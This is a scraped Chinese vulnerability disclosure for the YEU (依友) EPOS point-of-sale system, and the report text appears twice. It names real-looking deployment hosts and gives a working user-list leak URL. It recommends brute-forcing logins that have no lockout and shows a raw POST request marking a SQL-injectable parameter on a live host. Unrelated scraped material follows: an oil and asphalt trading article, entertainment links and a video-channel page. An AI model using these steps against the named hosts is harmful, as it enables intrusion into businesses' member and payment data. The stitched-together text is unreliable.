分享漏洞：
披露状态：
： 积极联系厂商并且等待厂商认领中，细节不对外公开
： 厂商已经主动忽略漏洞，细节向公众公开
简要描述：
依友POS系统登陆信息泄露及sql注入
详细说明：
“YEU依友软件”是杭州达罗尼科技有限公司旗下的软件产品品牌。
“YEU依友软件”系列产品是针对服装行业信息化建设的软件产品，特别适合产销一体的品牌企业，产品涵盖了从产品企划-产前-原料-计划-生产-物流-网商-分销-终端-全国营运的整个产业链及各业务管理细节；是唯一一家针对杭州女装企业特色，具有流程规范、KPI管控，操作简便又不失丰富功能的行业ERP软件，适合解决企业快速、多变、灵活、创新模式下的各种应用模式。总公司位于中国女装之都-杭州。达罗尼科技公司成立于2009年，由十几位有多年服装行业从业经验、精通营运管理及服装业信息化运用的专业人士创建。大家怀着同一梦想，不断学习和创新，将行业营运管理和计算机信息技术相结合，致力于中国服装品牌的崛起，以及推动服装行业的信息化管理进程。公司在短短三年多的时间里，员工数量达到70多人，并已在武汉、郑州成立分公司，客户总量已超过500家，成为服装行业一家新兴的集软件产品、信息化实施及行业咨询的企业。
EPOS系统是基于C#.NET + Jquery + Sql Server技术开发，主要适用于服装门店，以解决门店销售收银管理、库存管理、会员管理、财务管理、商品成本、销售库存分析、店务工作管理的一套系统。
EPOS系统地址举例：
http://120.199.28.158:8088/
http://shyzfz.vicp.cc:8088/
http://fuheerp.vicp.net:8088/
http://jxzq2012.oicp.net:8888/
漏洞详情：
1：用户名列表泄露，且系统无验证码，可暴力破解登陆。
用户名泄露地址：/Code/System/FunRepManage/SelFunOper.aspx?rid=xxxx(四位数字即可,通常即可）
举例：http://jxzq2012.oicp.net:8888/Code/System/FunRepManage/SelFunOper.aspx?rid=0001
http://120.199.28.158:8088//Code/System/FunRepManage/SelFunOper.aspx?rid=0001
泄露的信息包括userid及用户名（URL编码）。
既然有了用户名，并且无验证码及次数限制，暴力破解登陆系统
http://jxzq2012.oicp.net:3456)
会员信息：
并可对会员卡、金额操作等。
2：sql注入
http://jxzq2012.oicp.net:8888/DoCity.aspx
post类型，参数：__CALLBACKPARAM
code 区域POST /DoCity.aspx HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://jxzq2012.oicp.net:8888/DoCity.aspx
Content-Type: application/x-www-form- charset=utf-8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 ( MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: jxzq2012.oicp.net:8888
Content-Length: 207
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=vsblcoafqmfb4b55sim3up45; cod=15.75..520.540; csd=019099
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTE0NDQxNzQ1ODFkZIaFgkAqtYpxJZGlu6K5CvbimsCI&=%E6%9C%AA%E9%80%89%E6%8B%A9&=%E6%9C%AA%E9%80%89%E6%8B%A9&__CALLBACKID=__Page&__CALLBACKPARAM=411
存在的库及当前库：
当前库存在的表：
漏洞证明：
“YEU依友软件”是杭州达罗尼科技有限公司旗下的软件产品品牌。
“YEU依友软件”系列产品是针对服装行业信息化建设的软件产品，特别适合产销一体的品牌企业，产品涵盖了从产品企划-产前-原料-计划-生产-物流-网商-分销-终端-全国营运的整个产业链及各业务管理细节；是唯一一家针对杭州女装企业特色，具有流程规范、KPI管控，操作简便又不失丰富功能的行业ERP软件，适合解决企业快速、多变、灵活、创新模式下的各种应用模式。总公司位于中国女装之都-杭州。达罗尼科技公司成立于2009年，由十几位有多年服装行业从业经验、精通营运管理及服装业信息化运用的专业人士创建。大家怀着同一梦想，不断学习和创新，将行业营运管理和计算机信息技术相结合，致力于中国服装品牌的崛起，以及推动服装行业的信息化管理进程。公司在短短三年多的时间里，员工数量达到70多人，并已在武汉、郑州成立分公司，客户总量已超过500家，成为服装行业一家新兴的集软件产品、信息化实施及行业咨询的企业。
EPOS系统是基于C#.NET + Jquery + Sql Server技术开发，主要适用于服装门店，以解决门店销售收银管理、库存管理、会员管理、财务管理、商品成本、销售库存分析、店务工作管理的一套系统。
EPOS系统地址举例：
http://120.199.28.158:8088/
http://shyzfz.vicp.cc:8088/
http://fuheerp.vicp.net:8088/
http://jxzq2012.oicp.net:8888/
漏洞详情：
1：用户名列表泄露，且系统无验证码，可暴力破解登陆。
用户名泄露地址：/Code/System/FunRepManage/SelFunOper.aspx?rid=xxxx(四位数字即可,通常即可）
举例：http://jxzq2012.oicp.net:8888/Code/System/FunRepManage/SelFunOper.aspx?rid=0001
http://120.199.28.158:8088//Code/System/FunRepManage/SelFunOper.aspx?rid=0001
泄露的信息包括userid及用户名（URL编码）。
既然有了用户名，并且无验证码及次数限制，暴力破解登陆系统
http://jxzq2012.oicp.net:3456)
会员信息：
并可对会员卡、金额操作等。
2：sql注入
http://jxzq2012.oicp.net:8888/DoCity.aspx
post类型，参数：__CALLBACKPARAM
code 区域POST /DoCity.aspx HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://jxzq2012.oicp.net:8888/DoCity.aspx
Content-Type: application/x-www-form- charset=utf-8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 ( MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: jxzq2012.oicp.net:8888
Content-Length: 207
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=vsblcoafqmfb4b55sim3up45; cod=15.75..520.540; csd=019099
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTE0NDQxNzQ1ODFkZIaFgkAqtYpxJZGlu6K5CvbimsCI&=%E6%9C%AA%E9%80%89%E6%8B%A9&=%E6%9C%AA%E9%80%89%E6%8B%A9&__CALLBACKID=__Page&__CALLBACKPARAM=411
存在的库及当前库：
当前库存在的表：
修复方案：
版权声明：转载请注明来源 @
厂商回应：
未能联系到厂商或者厂商积极拒绝
漏洞评价：
对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
登录后才能发表评论，请先与往年的美女云集不同，现场也聚集了很多“小鲜肉”。
收到照片后傻眼了，把两位新人的缺点表现得淋漓尽致。
声明：本文由入驻搜狐公众平台的作者撰写，除搜狐官方账号外，观点仅代表作者本人，不代表搜狐立场。
　　王Z灵：API库存意外大增，沥青新低不断欧美盘操作指南
　　资讯摘要：
　　今天凌晨公布的最新美国API原油库存意外大增461万桶，其中汽油库存连续两周录得创纪录增加后，本周再次大增470万桶，库欣地区原油库存也连续第12个月上升。昨日WTI油价一度暴跌超7%，API数据无疑是雪上加霜。
　　周三(1月20日)全球股市下挫使得市场的避险情绪激增，但美元指数却在动荡的金融市场环境中明哲保身暂时震荡。由于市场密切关注欧洲央行在周四的决议，投资者对欧元兑美元十分谨慎，不愿意大量交投。不过，现货金价却在动荡的市场环境中收益，而原油价格却始终看不到阳光，并在周三的交投中再度创下十二年新低。虽然此后的空头回补一度扳回了大部分跌幅，但大增的API库存数据却再度剥夺了油价回升一丝希望。金价升2%，受股市和大宗商品市场下跌支撑；美国原油再度触及12年低位，受累于供应过剩和全球股市下挫以及API原油库存大增。
　　浙东大宗沥青技术面分析：
　　亚盘初至目前价格在小幅高开走高后回落，当前出现回补日内高开缺口位置，日线图上连续录得三根实体阴柱，布林带开口微张，60日、30日均线相交下行，附图指标上，MACD红柱放量，快慢线相交位于0轴下方趋向下行，KDJ三线趋近一点平行移动，目前整体的走势还是弱势震荡下行的走势，当前留意来自支撑位，短期结构依旧呈现弱势反复中，反弹压力下移，行情分析添加威.信KAHU98即可，操作上笔者王Z灵建议遵循反弹高位沽空思路为主；
　　本文由金融分析师王Z灵撰稿，转载请注明，详情关注王Z灵新浪博客
欢迎举报抄袭、转载、暴力色情及含有欺诈和虚假信息的不良文章。
请先登录再操作
请先登录再操作
微信扫一扫分享至朋友圈
搜狐公众平台官方账号
生活时尚&搭配博主 /生活时尚自媒体 /时尚类书籍作者
搜狐网教育频道官方账号
全球最大华文占星网站-专业研究星座命理及测算服务机构
王Z灵（QQ： ;电话：1552720...
主演：黄晓明/陈乔恩/乔任梁/谢君豪/吕佳容/戚迹
主演：陈晓/陈妍希/张馨予/杨明娜/毛晓彤/孙耀琦
主演：陈键锋/李依晓/张迪/郑亦桐/张明明/何彦霓
主演：尚格?云顿/乔?弗拉尼甘/Bianca Bree
主演：艾斯?库珀/ 查宁?塔图姆/ 乔纳?希尔
baby14岁写真曝光
李冰冰向成龙撒娇争宠
李湘遭闺蜜曝光旧爱
美女模特教老板走秀
曝搬砖男神奇葩择偶观
柳岩被迫成赚钱工具
大屁小P虐心恋
匆匆那年大结局
乔杉遭粉丝骚扰
男闺蜜的尴尬初夜
客服热线：86-10-
客服邮箱：依友软件--刘菊的自频道-优酷视频
你看不到我~
看不到我……
18视频播放数
还没有收到留言
自频道介绍：
还未添加自频道介绍
今日新增:0
点击这里添加你的微博秀,展示你的微博和粉丝。
微信分享给好友
@对他说/推荐给粉丝
自定义主页模块
自定义视频栏目求能统计出库、入库、库存、盘点的软件？
12-02-06 &
便捷软件容易上手、简单、实用、网络版才卖899元，单机版卖299元。
请登录后再发表评论!